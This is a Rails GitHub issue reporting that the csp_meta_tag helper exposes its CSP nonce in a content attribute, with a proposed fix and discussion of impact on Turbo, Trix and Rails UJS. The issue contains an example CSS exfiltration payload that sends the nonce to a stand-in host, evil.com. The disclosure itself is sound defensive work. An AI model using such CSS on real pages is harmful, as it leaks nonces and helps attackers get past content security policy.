csp_meta_tag helper generates a meta tag w/o out making use of the nonce hiding which could lead to nonce value exfiltration of nonce data

[tvongaza]

Previously reported via Hackerone, reference #2432937 - Was asked by @tenderlove to create an issue here.

@tvongaza thanks for reporting this! I'm also not clear on how one would go about exploiting / using this information. However, I definitely agree we should fix the attribute name in the meta tag. Would you mind filing an issue in the public tracker, and we can fix it there?
Thank you!

Steps to reproduce

The rails csp_meta_tag helper generates meta tag with a content attribute which in theory can have it's nonce value exfiltrated.

Example:

<%= csp_meta_tag %>

Generates:

<meta name="csp-nonce" content="f7505009ff5f468269b583653293acb5">

Which an attacker could access via carefully crafted css such as:

meta[content~="f7505009ff5f468269b583653293acb5"] {
  background: url("https://evil.com/nonce?f7505009ff5f468269b583653293acb5");
}

While I'm not too sure how this type of attack vector could be exploited, or used (have no working exploit), there seems to be ways to curb it via using the nonce attribute instead of the content attribute for the nonce value, which in most browser has nonce hiding behaviour.

Example, if we instead generated a meta tag like this:

<meta name="csp-nonce" nonce="f7505009ff5f468269b583653293acb5">

It the following would no longer work, as the only way to access the nonce value is via element.nonce property.

/* this fails, as in css nonce will always return an empty string */
meta[nonce~="f7505009ff5f468269b583653293acb5"] {
  background: url("https://evil.com/nonce?f7505009ff5f468269b583653293acb5");
}

document.querySelector('meta[name="csp-nonce"]').getAttribute("nonce"); // returns an empty string
document.querySelector('meta[name="csp-nonce"]').nonce; // returns "f7505009ff5f468269b583653293acb5"

More information:
whatwg/html#2369
https://developer.mozilla.org/en-US/docs/Web/HTML/Global_attributes/nonce#accessing_nonces_and_nonce_hiding

Note this would be a breaking change for libraries making use of the csp_meta_tag's content attributes. Examples include (but not limited to):

• Turbo: https://github.com/hotwired/turbo/blob/600203edf6a7fdba328bfbc9ca8c62354c7d3a27/src/util.js#L171 (& hotwire turbo in rails guides https://github.com/rails/rails/blob/main/guides/assets/javascripts/%40hotwired--turbo.js#L322)
• Trix: https://github.com/basecamp/trix/blob/968cedaa989e3feb120fd500abb92e382d980dc7/src/trix/core/helpers/custom_elements.js#L23 (& included asset: https://github.com/rails/rails/blob/main/actiontext/app/assets/javascripts/trix.js#L1038)
• Rails UJS: https://github.com/rails/rails/blob/main/actionview/app/assets/javascripts/rails-ujs.js#L27 & https://github.com/rails/rails/blob/main/actionview/app/assets/javascripts/rails-ujs.esm.js#L33

Impact

Low, not too sure what sort of attack vectors this achieves - others more familiar in this space may be more aware. However if there is an opportunity to have defence in depth we should take it.

Expected behavior

Nonce value exfiltration should be protected against.

Actual behavior

Nonce value exfiltration is possible.

System configuration

Rails version: HEAD as of April 16, 2024 (commit 1428ef9)

Ruby version: 3.3

[tenderlove]

I think we should make this change, but I'm not sure what the impact is on existing JS libraries. We're going to have to coordinate fixing Rails along with the corresponding JS libraries. If someone wants to handle that work, I'd really appreciate it!

[tvongaza]

On the rails side, I wonder if it would make sense to add a depreciation warning for csp_meta_tag and introduce a csp_nonce_meta_tag with the new behaviour. This would allow for a more graceful upgrade path.

I can take a shot at some PRs, I think the JS libraries can be made backwards compatible by looking for both nonce & content prior to the rails change.

Question: How are the JS files updated which are included in the Rails source? IE should I make PRs against both Trix & Rails for the change, or would just against the Trix repo be enough & the changes will be applied to the rails Trix asset at some point?